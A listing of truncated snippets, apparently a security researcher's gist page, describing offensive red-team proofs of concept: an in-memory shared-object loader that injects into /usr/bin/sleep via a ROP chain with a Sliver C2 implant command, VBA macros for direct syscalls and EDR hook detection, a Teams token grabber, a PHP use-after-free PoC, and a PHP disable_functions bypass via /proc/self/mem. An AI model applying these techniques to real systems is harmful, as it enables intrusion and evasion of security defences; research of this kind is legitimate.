X-C3LL

// gcc estibador.c -o estibador -pie -fPIC
// [server] sliver > generate --http https://192.168.13.37/ --os linux --arch amd64

//Refs:
//
// https://refspecs.linuxfoundation.org/elf/gabi4+/ch4.eheader.html
// binfmt_elf.c
// http://manugarg.appspot.com/aboutelfauxiliaryvectors.html
//

X-C3LL

This is just a Proof of Concept. It does:

1. Decrypt shared object from disk
2. Create a new memfd using memfd_create and write the shared object on it
3. Forks and spawns /usr/bin/sleep in the child using execve with a masked name (here /this/is/a/PoC . The path to the memfd is passed via an env var
4. The parent reads sleep's /proc/PID/mem and search for gadgets.
5. Also it looks for the address that would return the nanosleep call inside /usr/bin/sleep, then search for this address in the stack
6. It uses /proc/PID/syscall to get the return address of nanosleep syscall
7. Craft a simple ROP chain to execute dlopen(path-to-my-memfd, RTLD_NOW)
8. Overwrite the return address in the stack

X-C3LL

#!/usr/bin/env python3

# Author: Juan Manuel Fernandez (@TheXC3LL)

import sys
import r2pipe
import binascii

# Edit with your needs
targets = ["sym.__GI___close_nocancel", "sym.__read_nocancel", "sym.__open_nocancel", "sym.__mmap", "sym.__GI___fstat64"]

X-C3LL

// Obtain teams token - you can reuse it for GoMapEnum for example
// Author: Juan Manuel Fernandez (@TheXC3LL)

const puppeteer = require('puppeteer');

(async () => {
    console.log("\t\tMS Teams Token Generator - @TheXC3LL\n\n");
    const username = process.argv[2];
    const password = process.argv[3];
    console.log("[*] Using credentials: %s:%s", username, password);

X-C3LL

' Proof of Concept: retrieving SSN for syscalling in VBA
' Author: Juan Manuel Fernandez (@TheXC3LL)


'Based on:
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
'https://www.crummie5.club/freshycalls/


Private Type LARGE_INTEGER

X-C3LL

<?php

// BUG #81691 https://bugs.php.net/bug.php?id=81691
// POC: Memory Leak via Use-After-Free


//export USE_ZEND_ALLOC=0

X-C3LL

Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr

X-C3LL

#!/usr/bin/env python3


from difflib import SequenceMatcher

import sys

def words(words_file):
	try:
		with open(words_file, "r") as file:

X-C3LL

#!/usr/bin/python
#coding: utf-8

# F-Isolation v0.1 - F**k isolated enviroments

# Because we hate that kind of pentests where you start at an isolated citrix where our
# clipboard is useless, we do not have internet access inside the machine and we can not
# map a local resource to upload our tools.

# OCR + Keyboard emulation FTW!

X-C3LL

<?php

/*

If open_basedir is misconfigured it is posible to read and write /proc/self/mem. This means that a PHP script can self-patch 
itself to bypass disable_functions and call system() or other dangerous functions. This technique is old, indeed you can find
a PoC by Beched (https://github.com/beched/php_disable_functions_bypass) where the open@plt address is replaced by the system@plt
address (the info is extraced parsing the PHP and libc binary).

My approach is similar in the sense of taking the advantage of /usr/proc/mem, but to achieve the bypass I overwrite the handler